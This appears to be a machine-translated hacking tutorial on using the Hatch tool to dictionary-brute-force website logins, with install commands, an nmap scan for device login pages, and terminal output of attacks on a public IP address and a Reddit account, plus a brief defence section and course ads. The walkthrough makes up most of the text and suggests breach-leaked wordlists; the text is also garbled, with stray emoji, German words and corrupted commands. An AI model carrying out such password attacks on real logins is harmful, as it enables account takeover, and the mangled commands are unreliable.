How to brute force login to almost any website with Hatch (2023)

The brute force tactic of a login, i.e. trying out many passwords very quickly until you find the right one, can be easy for services such as SSH or Telnet. For something like a website login page, we first need to identify various elements on the page. Thanks to a Python brute force website tool called Hatch, this process has been simplified enough for even a novice to try.

This is how brute force attacks work

Brute force attacks use automation to try many more passwords than a human could, breaking into a system through trial and error. More targeted brute force attacks use a list of common passwords to speed this up, called dictionary attacks, and using this technique to check for weak passwords is often the first attack a hacker attempts against a system.

A brute force attack on a service such as SSH can easily be done from the command line using tools such asSshtrixGenericName🇧🇷 On a single line in a terminal, it's easy to launch a dictionary attack against a discovered SSH server using the built-in password list, making it very likely for services to be hacked with wrong passwords.

• Do not miss:Use beginner python to create a brute force tool on SHA-1 hashes

The main disadvantage of a dictionary attack is that if the password is not in thePasswortliste, the attack fails. When the password is used for a destinationit is strong, Brute force attacks can quickly become very time and resource consuming when we start trying every possible combination of characters. Another downside is that many services now perform some form of rate limiting, which intercepts too many failed login attempts and blocks further attempts for a period of time, which can significantly slow down a brute force attack.

Why brute force attacks on websites are more difficult

While it's easy to attack a service with a username and password from the command line, there's a lot more going on inside a website's code. To design this attack, we need to think about what the script needs to know in order to do its job.

We want the script to find the correct password associated with a specific account by typing a guess into the fields on the login page and submitting it until we get a successful result. For this we have to interact with the graphical user interface of the login page to enter the information in the correct fields of the login and password fields.

After that, we have to submit the guess by clicking on the "Submit" button on the page. Finally, the script needs to know the difference between a failure and a success so we can stop the script and identify the correct password.

It's all a lot more work and quite confusing for beginners, but once you've done that you can automate brute force attacks against the login page of most websites, much like brute force attacks against an SSH service.

Hatch-to-Brute-Force-Web-Logins

Python is an ideal language for automating these types of attacks, and Hatch uses Python2 to automate the Chrome web browser to perform a dictionary login attack on any webpage with a visible login forum. While some websites with hidden login forums that require you to scroll or click to view can confuse the script, most websites can be easily attacked using this tool.

When you launch Hatch, the script opens a Chrome window for you to examine the target page elements. Once you tell the script which site you want to force login to, it verifies that the site exists and is accessible. If so, Hatch will ask which login you want to brute force and then ask for a list of passwords to try during the attack.

Once Hatch has the information it needs, it opens a second Chrome window and begins automating the attack. You can sit back and watch the attack in your Chrome window or in the terminal where the attack is running. In the terminal, you can watch each password attempt as the script cycles through the list. While this attack is powerful and useful against a variety of targets, it can also be thwarted by rate limiting and other methods of blocking excessive login attempts.

what will you need

Although Hatch is cross-platform, it was a little tricky to set up on some systems. We ended up getting Hatch running on a Windows system with a few script changes that we've included here.

To follow this guide, you need a Windows system with Chrome and Python 2 installed. The current, modern version of Python is Python3, so you need to make sure you're using the correct version when running the script. When you run Hatch with Python3 it doesn't work properly.

You'll also need to install some dependencies, including a driver, in order to programmatically interact with Chrome.

Step 1: Check your Python version

First we need to install some dependencies. To do this, press the Windows key or click on the Start menu and typecmd🇧🇷 After opening a command prompt, verify that Python2 is installed correctly by typing the followingPython2in the terminal window. You must see oneresultAs follows.

C:\> python2λ python2Python 2.7.13 (vs.7.13:a06454b1afa1, Dec 17 2016, 20:53:40) [MSC v.1500 64 bit (AMD64)] no win32Type "help", "copyright", " credits " or "License" for more information.>>>

If not, you canDownload Python2🇧🇷 After installing Python2, enter the following commands to install the dependencies.

C:\> pip2 install seleniumC:\> pip2 install request

Step 2: Install Chrome driver

Next we need to install the driver that will allow us to control Chrome through the Python program. To do this, we download a fileo Page makes drivers for Chromeand then create a folder calledWebtreiberon your C drive. Move the downloaded file to this folder. Although you could place it in a different directory, you would have to change your Python code.

Step 3: Download and install Hatch

To install Hatch, you can either change the directory on your C drive before cloning to make sure you can find it, or go to another location you can find. modelCD ..to switch to your computer's C drive if you want it there. You can download a forked version of Hatchfrom the GitHub pageOpen a terminal window and enter the following.

C:\> Git-Klon https://github.com/nsgodshall/Hatch.git

This forked version has been modified to work on Windows. After downloading, you can enterCD-LukeChange directories to the download folder.

C:\> cd Luke

Step 4: Run Hatch and select your router login

Now that we have Hatch installed on our system and all dependencies, it's time to run Hatch and see how it works. First, let's take a look at the help file by running the following in the hatch folder.

C:\> python2 main.py -h

You should see an output like below.

C:\Documents\PythonScripts\Hatch (master -> origin)λ python2 main.py -hUsage: main.py [options]Options: -h, --help Display this help message and exit -u USERNAME, --username = USERNAME Choose username --usernamesel+USERNAMESEL Choose username selection --passel=PASSEL Choose password selection --loginsel=LOGINSEL Choose login button selection --passlist+PASSLIST Enter login directory password list --website=WEBSITE Choose a website

We can see the main options for Hatch here. First, let's select an attack target on our local network.

A good device on your local network to test this would be something like a router, printer, or other device with a network login page. You can select this by running aNmapScan the network for IP addresses that have port 80 open. While port 80 is the most common page for web access, you can also search ports 81, 8080, 8081, 443 to find login pages for different devices.

Next we need to find the subnet range so we can scan the local network. To find this you can useipcalcto calculate your subnet range after finding your computer's local IP address. For example, if your computer has an IP address of 192.168.0.3, you can runipcalc 192.168.0.3to get the IP range for all possible IP addresses on this network. In this case it would be 192.168.0.0/24.

Once you know the range, run the following Nmap scan on your network using theiprangePart changed to add IP range of your network.

C:\> sudo nmap -p 80,8080,81,8081,443 iprange

If this check returns, any service that lists the port as "open" must be hosting a website. Navigate to a printer or router that allows you to login by typing the IP address followed by a colon and the port number we found in Nmap. You should see a login page like this:

Step 5: Identify login items

Now we can perform the hatch, but we still need more information to perform this attack. Run Hatch by typing the following command after navigating to the folder where you previously saved the program.

C:\> python2 main.py

A Google Chrome window should open and allow us to navigate to a website that we want to attack and start identifying the parts of the website that we want to manipulate.

C:\Documents\PythonScripts\Hatch (master -> origin)λ python2 main.py -hDevTools listens to ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 (_ | || (__ | | | | | | _| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> encoded by Metachar [-]--> Brute Force Tool[ ~] Enter a website: http://202.216.246.99/[!] Check if website exists [OK]

Enter the URL of the target site's login page at the first Hatch prompt. It is verified that the website exists and can be accessed. Next we need to identify the login and password elements for the page we are attacking.

On our landing login page, right-click the "Username" element and click "Inspect".

Then click the ellipses (•••) to the left of the window and a drop-down menu will appear. Click Copy, then click Copy Selection to copy what Hatch needs to select and interact with that item. It should be something like "#username".

Paste the username picker into Hatch and repeat the process with the "password" picker.

C:\Documents\PythonScripts\Hatch (master -> origin)λ python2 main.py -hDevTools listens to ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 (_ | || (__ | | | | | | _| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> encoded by Metachar [-]--> Brute Force Tool[ ~] Enter a website: http://202.216.246.99/[!] Check if the website exists [OK][~] Enter the username selector: #username [~] Enter the password selector enter: #passwd[~] Enter the login button selector:

Finally, right click on the "Login" button to get the selector info and add it to the hatch as well.

Now that we've selected the items, let's define the username, which we're trying to brute force. In this case, let's just typeAdministrator🇧🇷 The final step is to select the default list that comes with Hatch. This is "passlist.txt" by default, so we use this list in our first attack.

C:\Documents\PythonScripts\Hatch (master -> origin)λ python2 main.py -hDevTools listens to ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 (_ | || (__ | | | | | | _| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> encoded by Metachar [-]--> Brute Force Tool[ ~] Enter a website: http://202.216.246.99/[!] Check if the website exists [OK][~] Enter the username selector: #username [~] Enter the password selection: #passwd[~] Enter the login button selection: #login_ok[~] Enter the brute force username: admin[~] Enter a directory for a list of passwords: passlist.txtDevTools, the ws:/ /127.0 .0.1 is listening on :7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705dDevTools is listening on ws://127.0.0.1:7848/devtools/browser/33d370d5-46dbb-4d56-a783564e073564e073564e073564e073564e073564e073564e073564e073564e073564e073564e073564e

This password list isn't huge, but it includes many common passwords. PressTurn back, and Hatch will open a new window to brute-force the password with the dictionary attack. You can monitor the progress in the terminal window or in the Chrome window that Hatch automates.

C:\Documents\PythonScripts\Hatch (master -> origin)λ python2 main.py -hDevTools listens to ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f _ _ _ _ | 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 (_ | || (__ | | | | | | _| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> encoded by Metachar [-]--> Brute Force Tool[ ~] Enter a website: http://202.216.246.99/[!] Check if the website exists [OK][~] Enter the username selector: #username [~] Enter the password selection: #passwd[~] Enter the login button selection: #login_ok[~] Enter the brute force username: admin[~] Enter a directory for a list of passwords: passlist.txtDevTools, the ws:/ /127.0 .0.1 listening :7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705dDevTools listening on ws://127.0.0.1:7848/devtools/browser/33d370d5-46dbb-4d56-a7835564------ -e07 --- ---------------Attempted password: 123456 for user: admin---------------------- -------- ---------- --------------- ------Attempted password: Password for user: admin--- ------------------ ---------- ----- ----------------- ------- ---Attempted password: qwertyfor user: admin- ---------- ----------------------------- -------- Attempted password: Hackthis1 for user: admin

Step 6: Update your word list and run it on an external website

If you are not satisfied with the word list included with Hatch, you can add it by opening it in a text editor such as Nano or by adding another word list fromany wordlist repository, howleaked through data breaches🇧🇷 After downloading a word list of your choice, you can add it to the "Hatch" folder and select it instead of the default list.

• Do not miss:Automate brute force attacks for Nmap scans

Once you have a list of passwords that you're happy with, we'll test them on a standard website. Create a disposable account on Reddit.com or another site and remember your login name. Set the account password to one from one of the word lists.

Once the dummy account is set up, run Hatch again and enter itreddit.com/login(or the login page of the website you selected). Then paste the selectors into the login, password, and button pickers. Finally, enter the target username and select the password list that contains the correct credentials. PressTurn back, and the script should open a Chrome window and begin automating the attack.

Once the script detects a successful login, it will display the successful password. While the original script tended to skip this and generate the wrong password on Windows, my friend Nick modified the code to prevent this in his forked version. If you feel any craziness from the forked version, you can always give it a tryOriginal Lukenversion.

🇧🇷_ _ _ _ | 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 🇧🇷 (_ | || (__ | | | | | | _| |_|\__,_|\__\___|_| |_| [-]--> V.1.0 [-]--> encoded by Metachar [-]--> Brute Force Tool[ ~] Enter a website: http://www.reddit.com/login[!] Verify that the website exists [~] Enter the username selector: #loginUsername [~] Enter the password selector enter: #loginPassword[~] Enter Login Button Selector: body > div > div > div.PageColumn.PageColumn__right > div > form > fieldset:nth-child(10) > button[~] Enter the username for brute force :hackthisaccountNB[~ ] Enter a directory for a list of passwords: passlist.txtDevTools listing on ws://127.0.0.1:11301/devtools/browser/6fd2f19e-9fef-4921-863f-d3316ec3b808DevTools listing on ws: //127.0.0.1:11318/ devtools/browser/f8d672c9-8e46-477c-a93d-baf0ea6b50e1------------------------------------- Attempted password: 123456 for User: hackthisaccountNB-- --- ------------------------------------- ----- -V requested password: password for user: hackthisaccountNB ------------------------------- -attempted password: qwertyfor usu ry: hackthisaccountNB--- ------------------ -----------AN ITEM WAS REMOVED FROM THE PAGE SOURCE THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN BLOCKED FROM TRY!LAST PASSAGE ATTEMPT BELOWFound Password: qwertyEnjoy :)

How to defend against brute force

Websites can best defend against these attacks by ensuring that sensible brute force protections are implemented against dictionary and other types of attacks. Can a normal user try 100 times to log in with the wrong password from someone else's IP address? The answer is probably no. Be very careful with websites that don't take these precautions as they are more prone to leaking your account information.

on the user side,Choose strong and random passwordsand save them in aPasswortmanagercan help ensure that your password never ends up on a password list. In general, using two-factor authentication whenever possible is the best defense against this type of tactic, as it will notify you of the login attempt. For important accounts, you should always enable two-factor authentication.

I hope you enjoyed this guide on using Hatch to automate dictionary attacks against web logins! If you have any questions about this Web Dictionary Attacks tutorial or comment, feel free to post them in the comments below or contact me on Twitter@KodyKinzie.

Do you want to make money like a white hat hacker?Start your hacking career with ourPremium Ethical Hacking Certification Training Bundle 2020from the new onezero byte storageand receive over 60 hours of training from cybersecurity experts.

Buy now (90% discount) >

Other offers worth checking out:

• 97% off Ultimate White Hat Hacker 2021 Certification Pack
• 99% off Data Scientist All-in-One Mega Pack 2021
• 98% discount on Learn to Code Premium 2021 Certification Pack
• 62% discount on MindMaster mind mapping software: perpetual license